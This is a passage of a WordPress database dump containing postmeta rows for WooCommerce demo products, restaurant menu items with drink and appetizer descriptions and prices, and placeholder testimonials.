gs','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41981,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41982,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41983,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41984,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41985,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41986,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41987,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41988,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41989,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41990,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41991,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41992,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41993,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41994,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41995,3122,'mkdf_show_new_sign_woo_meta','no'),(41996,3122,'slide_template',''),(41997,3122,'_wpb_vc_js_status','false'),(41998,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41999,528,'_sku','PR0034'),(42000,528,'_regular_price','150'),(42001,528,'_sale_price','115'),(42002,528,'_sale_price_dates_from',''),(42003,528,'_sale_price_dates_to',''),(42004,528,'total_sales','0'),(42005,528,'_tax_status','taxable'),(42006,528,'_tax_class',''),(42007,528,'_manage_stock','no'),(42008,528,'_backorders','no'),(42009,528,'_sold_individually','no'),(42010,528,'_weight','350'),(42011,528,'_length',''),(42012,528,'_width',''),(42013,528,'_height',''),(42014,528,'_upsell_ids','a:0:{}'),(42015,528,'_crosssell_ids','a:0:{}'),(42016,528,'_purchase_note',''),(42017,528,'_default_attributes','a:0:{}'),(42018,528,'_virtual','no'),(42019,528,'_downloadable','no'),(42020,528,'_product_image_gallery',''),(42021,528,'_download_limit','-1'),(42022,528,'_download_expiry','-1'),(42023,528,'_thumbnail_id','520'),(42024,528,'_stock',''),(42025,528,'_stock_status','instock'),(42026,528,'_wc_average_rating','3.00'),(42027,528,'_wc_rating_count','a:1:{i:3;i:1;}'),(42028,528,'_wc_review_count','1'),(42029,528,'_downloadable_files','a:0:{}'),(42030,528,'_product_attributes','a:0:{}'),(42031,528,'_product_version','3.4.3'),(42032,528,'_price','115'),(42033,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42034,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42035,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42036,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42037,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42038,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42039,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42040,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42041,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42042,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42043,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42044,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42045,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42046,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42047,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42048,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42049,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42050,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42051,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42052,528,'mkdf_show_new_sign_woo_meta','no'),(42053,528,'slide_template','default'),(42054,528,'_wpb_vc_js_status','false'),(42055,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42056,530,'_sku','PR0035'),(42057,530,'_regular_price','50'),(42058,530,'_sale_price',''),(42059,530,'_sale_price_dates_from',''),(42060,530,'_sale_price_dates_to',''),(42061,530,'total_sales','0'),(42062,530,'_tax_status','taxable'),(42063,530,'_tax_class',''),(42064,530,'_manage_stock','no'),(42065,530,'_backorders','no'),(42066,530,'_sold_individually','no'),(42067,530,'_weight','150'),(42068,530,'_length',''),(42069,530,'_width',''),(42070,530,'_height',''),(42071,530,'_upsell_ids','a:0:{}'),(42072,530,'_crosssell_ids','a:0:{}'),(42073,530,'_purchase_note',''),(42074,530,'_default_attributes','a:0:{}'),(42075,530,'_virtual','no'),(42076,530,'_downloadable','no'),(42077,530,'_product_image_gallery',''),(42078,530,'_download_limit','-1'),(42079,530,'_download_expiry','-1'),(42080,530,'_thumbnail_id','521'),(42081,530,'_stock',''),(42082,530,'_stock_status','instock'),(42083,530,'_wc_average_rating','5.00'),(42084,530,'_wc_rating_count','a:1:{i:5;i:1;}'),(42085,530,'_wc_review_count','1'),(42086,530,'_downloadable_files','a:0:{}'),(42087,530,'_product_attributes','a:0:{}'),(42088,530,'_product_version','3.4.3'),(42089,530,'_price','50'),(42090,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42091,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42092,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42093,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42094,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42095,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42096,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42097,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42098,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42099,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42100,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42101,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42102,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42103,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42104,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42105,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42106,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42107,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42108,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42109,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42110,530,'mkdf_show_new_sign_woo_meta','no'),(42111,530,'slide_template',''),(42112,530,'_wpb_vc_js_status','false'),(42113,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42114,3123,'_sku','PR0036'),(42115,3123,'_regular_price','100'),(42116,3123,'_sale_price',''),(42117,3123,'_sale_price_dates_from',''),(42118,3123,'_sale_price_dates_to',''),(42119,3123,'total_sales','0'),(42120,3123,'_tax_status','taxable'),(42121,3123,'_tax_class',''),(42122,3123,'_manage_stock','no'),(42123,3123,'_backorders','no'),(42124,3123,'_sold_individually','no'),(42125,3123,'_weight','100'),(42126,3123,'_length',''),(42127,3123,'_width',''),(42128,3123,'_height',''),(42129,3123,'_upsell_ids','a:0:{}'),(42130,3123,'_crosssell_ids','a:0:{}'),(42131,3123,'_purchase_note',''),(42132,3123,'_default_attributes','a:0:{}'),(42133,3123,'_virtual','no'),(42134,3123,'_downloadable','no'),(42135,3123,'_product_image_gallery',''),(42136,3123,'_download_limit','-1'),(42137,3123,'_download_expiry','-1'),(42138,3123,'_thumbnail_id','519'),(42139,3123,'_stock',''),(42140,3123,'_stock_status','outofstock'),(42141,3123,'_wc_average_rating','5.00'),(42142,3123,'_wc_rating_count','a:1:{i:5;i:1;}'),(42143,3123,'_wc_review_count','1'),(42144,3123,'_downloadable_files','a:0:{}'),(42145,3123,'_product_attributes','a:0:{}'),(42146,3123,'_product_version','3.4.3'),(42147,3123,'_price','100'),(42148,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42149,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42150,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42151,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42152,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42153,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42154,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42155,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42156,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42157,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42158,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42159,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42160,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42161,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42162,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42163,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42164,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42165,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42166,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42167,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42168,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42169,3123,'mkdf_show_new_sign_woo_meta','no'),(42170,3123,'slide_template','default'),(42171,3123,'_wpb_vc_js_status','false'),(42172,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42173,3124,'_sku','PR0037'),(42174,3124,'_regular_price','120'),(42175,3124,'_sale_price',''),(42176,3124,'_sale_price_dates_from',''),(42177,3124,'_sale_price_dates_to',''),(42178,3124,'total_sales','0'),(42179,3124,'_tax_status','taxable'),(42180,3124,'_tax_class',''),(42181,3124,'_manage_stock','no'),(42182,3124,'_backorders','no'),(42183,3124,'_sold_individually','no'),(42184,3124,'_weight','150'),(42185,3124,'_length',''),(42186,3124,'_width',''),(42187,3124,'_height',''),(42188,3124,'_upsell_ids','a:0:{}'),(42189,3124,'_crosssell_ids','a:0:{}'),(42190,3124,'_purchase_note',''),(42191,3124,'_default_attributes','a:0:{}'),(42192,3124,'_virtual','no'),(42193,3124,'_downloadable','no'),(42194,3124,'_product_image_gallery',''),(42195,3124,'_download_limit','-1'),(42196,3124,'_download_expiry','-1'),(42197,3124,'_thumbnail_id','518'),(42198,3124,'_stock',''),(42199,3124,'_stock_status','instock'),(42200,3124,'_wc_average_rating','5.00'),(42201,3124,'_wc_rating_count','a:1:{i:5;i:1;}'),(42202,3124,'_wc_review_count','1'),(42203,3124,'_downloadable_files','a:0:{}'),(42204,3124,'_product_attributes','a:0:{}'),(42205,3124,'_product_version','3.4.3'),(42206,3124,'_price','120'),(42207,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42208,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42209,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42210,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42211,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42212,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42213,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42214,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42215,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42216,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42217,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42218,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42219,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42220,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42221,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42222,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42223,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42224,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42225,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42226,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42227,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42228,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42229,3124,'mkdf_show_new_sign_woo_meta','yes'),(42230,3124,'slide_template','default'),(42231,3124,'_wpb_vc_js_status','false'),(42232,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42233,3125,'_sku','PR0038'),(42234,3125,'_regular_price','185'),(42235,3125,'_sale_price','120'),(42236,3125,'_sale_price_dates_from',''),(42237,3125,'_sale_price_dates_to',''),(42238,3125,'total_sales','0'),(42239,3125,'_tax_status','taxable'),(42240,3125,'_tax_class',''),(42241,3125,'_manage_stock','no'),(42242,3125,'_backorders','no'),(42243,3125,'_sold_individually','no'),(42244,3125,'_weight','185'),(42245,3125,'_length',''),(42246,3125,'_width',''),(42247,3125,'_height',''),(42248,3125,'_upsell_ids','a:0:{}'),(42249,3125,'_crosssell_ids','a:0:{}'),(42250,3125,'_purchase_note',''),(42251,3125,'_default_attributes','a:0:{}'),(42252,3125,'_virtual','no'),(42253,3125,'_downloadable','no'),(42254,3125,'_product_image_gallery',''),(42255,3125,'_download_limit','-1'),(42256,3125,'_download_expiry','-1'),(42257,3125,'_thumbnail_id','535'),(42258,3125,'_stock',''),(42259,3125,'_stock_status','instock'),(42260,3125,'_wc_average_rating','3.50'),(42261,3125,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(42262,3125,'_wc_review_count','2'),(42263,3125,'_downloadable_files','a:0:{}'),(42264,3125,'_product_attributes','a:0:{}'),(42265,3125,'_product_version','3.4.3'),(42266,3125,'_price','120'),(42267,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42268,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42269,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42270,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42271,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42272,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42273,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42274,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42275,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42276,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42277,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42278,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42279,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42280,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42281,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42282,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42283,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42284,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42285,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42286,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42287,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42288,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42289,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42290,3125,'mkdf_show_new_sign_woo_meta','no'),(42291,3125,'slide_template','default'),(42292,3125,'_wpb_vc_js_status','false'),(42293,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42294,3126,'_sku','PR0039'),(42295,3126,'_regular_price','200'),(42296,3126,'_sale_price',''),(42297,3126,'_sale_price_dates_from',''),(42298,3126,'_sale_price_dates_to',''),(42299,3126,'total_sales','0'),(42300,3126,'_tax_status','taxable'),(42301,3126,'_tax_class',''),(42302,3126,'_manage_stock','no'),(42303,3126,'_backorders','no'),(42304,3126,'_sold_individually','no'),(42305,3126,'_weight','185'),(42306,3126,'_length',''),(42307,3126,'_width',''),(42308,3126,'_height',''),(42309,3126,'_upsell_ids','a:0:{}'),(42310,3126,'_crosssell_ids','a:0:{}'),(42311,3126,'_purchase_note',''),(42312,3126,'_default_attributes','a:0:{}'),(42313,3126,'_virtual','no'),(42314,3126,'_downloadable','no'),(42315,3126,'_product_image_gallery',''),(42316,3126,'_download_limit','-1'),(42317,3126,'_download_expiry','-1'),(52078,4352,'_menu_item_url','#'),(42319,3126,'_stock',''),(42320,3126,'_stock_status','instock'),(42321,3126,'_wc_average_rating','0'),(42322,3126,'_wc_rating_count','a:0:{}'),(42323,3126,'_wc_review_count','0'),(42324,3126,'_downloadable_files','a:0:{}'),(42325,3126,'_product_attributes','a:0:{}'),(42326,3126,'_product_version','3.4.3'),(42327,3126,'_price','200'),(42328,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42329,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42330,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42331,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42332,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42333,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42334,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42335,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42336,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42337,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42338,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42339,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42340,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42341,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42342,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42343,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42344,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42345,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42346,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42347,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42348,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42349,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42350,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42351,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42352,3126,'mkdf_show_new_sign_woo_meta','no'),(42353,3126,'slide_template','default'),(42354,3126,'_wpb_vc_js_status','false'),(42355,3127,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42356,3127,'restaurant_menu_item_price','20'),(42357,3127,'restaurant_menu_item_description','Rye, genever, demerara, and green chartreuse'),(42358,3127,'slide_template','default'),(42359,3127,'restaurant_menu_item_label','1'),(42360,3128,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42361,3128,'restaurant_menu_item_price','30$'),(42362,3128,'restaurant_menu_item_description','Scotch, cranberry grenadine, lemon, and gilka kummel'),(42363,3128,'restaurant_menu_item_label','2'),(42364,3128,'slide_template','default'),(42365,3129,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42366,3129,'restaurant_menu_item_price','26$'),(42367,3129,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(42368,3129,'restaurant_menu_item_label','3'),(42369,3129,'slide_template','default'),(42370,3130,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42371,3130,'restaurant_menu_item_price','50$'),(42372,3130,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(42373,3130,'slide_template','default'),(42374,3131,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42375,3131,'restaurant_menu_item_price','15$'),(42376,3131,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(42377,3131,'slide_template','default'),(42378,3132,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42379,3132,'restaurant_menu_item_price','10$'),(42380,3132,'restaurant_menu_item_description','Sweet vermouth, amaro lucano, and saline'),(42381,3132,'slide_template','default'),(42382,3133,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42383,3133,'restaurant_menu_item_price','30$'),(42384,3133,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(42385,3133,'slide_template','default'),(42386,3134,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42387,3134,'restaurant_menu_item_price','35$'),(42388,3134,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(42389,3134,'slide_template','default'),(42390,3135,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42391,3135,'restaurant_menu_item_price','50$'),(42392,3135,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(42393,3135,'slide_template','default'),(42394,3136,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42395,3136,'restaurant_menu_item_price','20$'),(42396,3136,'restaurant_menu_item_description','France (Provence) Cinsault, Grenache France (Provence) Cinsault, Grenache'),(42397,3136,'slide_template','default'),(42398,3137,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42399,3137,'restaurant_menu_item_price','50$'),(42400,3137,'restaurant_menu_item_description','France (Loire) Sauvignon Blanc France (Loire) Sauvignon Blanc'),(42401,3137,'slide_template','default'),(42402,3138,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42403,3138,'restaurant_menu_item_price','70$'),(42404,3138,'restaurant_menu_item_description','Portugal (Douro) Rabigato, Codéga de LarinhoFrance (Provence) Cinsault'),(42405,3138,'slide_template','default'),(42406,3139,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42407,3139,'restaurant_menu_item_price','30$'),(42408,3139,'restaurant_menu_item_description','France (Burgundy) Chardonnay'),(42409,3139,'slide_template','default'),(42410,3140,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42411,3140,'restaurant_menu_item_price','20$'),(42412,3140,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(42413,3140,'slide_template','default'),(42414,3141,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42415,3141,'restaurant_menu_item_price','70$'),(42416,3141,'restaurant_menu_item_description','France (Provence) Cinsault'),(42417,3141,'slide_template','default'),(42418,3142,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42419,3142,'restaurant_menu_item_price','20$'),(42420,3142,'restaurant_menu_item_description','France (Loire)'),(42421,3142,'slide_template','default'),(42422,3143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42423,3143,'restaurant_menu_item_price','80$'),(42424,3143,'restaurant_menu_item_description','Portugal (Douro) Rabigato'),(42425,3143,'slide_template','default'),(42426,3144,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42427,3144,'restaurant_menu_item_price','50$'),(42428,3144,'restaurant_menu_item_description','Ground cumin, avocados, peeled and cubed'),(42429,3144,'slide_template','default'),(42430,3145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42431,3145,'restaurant_menu_item_price','30$'),(42432,3145,'restaurant_menu_item_description','Fresh goat cheese, garlic cloves, minced'),(42433,3145,'slide_template','default'),(42434,3146,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42435,3146,'restaurant_menu_item_price','70$'),(42436,3146,'restaurant_menu_item_description','Garbanzo beans or chickpeas, rinsed and drained'),(42437,3146,'slide_template','default'),(42438,3147,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42439,3147,'restaurant_menu_item_price','50$'),(42440,3147,'restaurant_menu_item_description','Marinated artichoke hearts'),(42441,3147,'slide_template','default'),(42442,3148,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42443,3148,'restaurant_menu_item_price','30$'),(42444,3148,'restaurant_menu_item_description','Spreadable cream cheese, crumbled blue cheese'),(42445,3148,'slide_template','default'),(42446,3149,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42447,3149,'restaurant_menu_item_price','20$'),(42448,3149,'restaurant_menu_item_description','French bread baguette, cooked ham, potato salad'),(42449,3149,'slide_template','default'),(42450,3150,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42451,3150,'restaurant_menu_item_price','10$'),(42452,3150,'restaurant_menu_item_description','Cream cheese, softened, butter, brown sugar'),(42453,3150,'slide_template','default'),(42454,3151,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42455,3151,'restaurant_menu_item_price','30$'),(42456,3151,'restaurant_menu_item_description','Cherry-size fresh mozzarella cheese balls'),(42457,3151,'slide_template','default'),(42458,1346,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42459,1346,'restaurant_menu_item_price','50$'),(42460,1346,'restaurant_menu_item_description','Hummus, Greek olives, feta cheese'),(42461,1346,'slide_template','default'),(42462,3152,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42463,3152,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(42464,3152,'mkdf_testimonial_author','anthony johnston'),(42465,3152,'mkdf_testimonial_author_position','guest'),(42466,3152,'slide_template','default'),(42467,3153,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42468,3153,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in 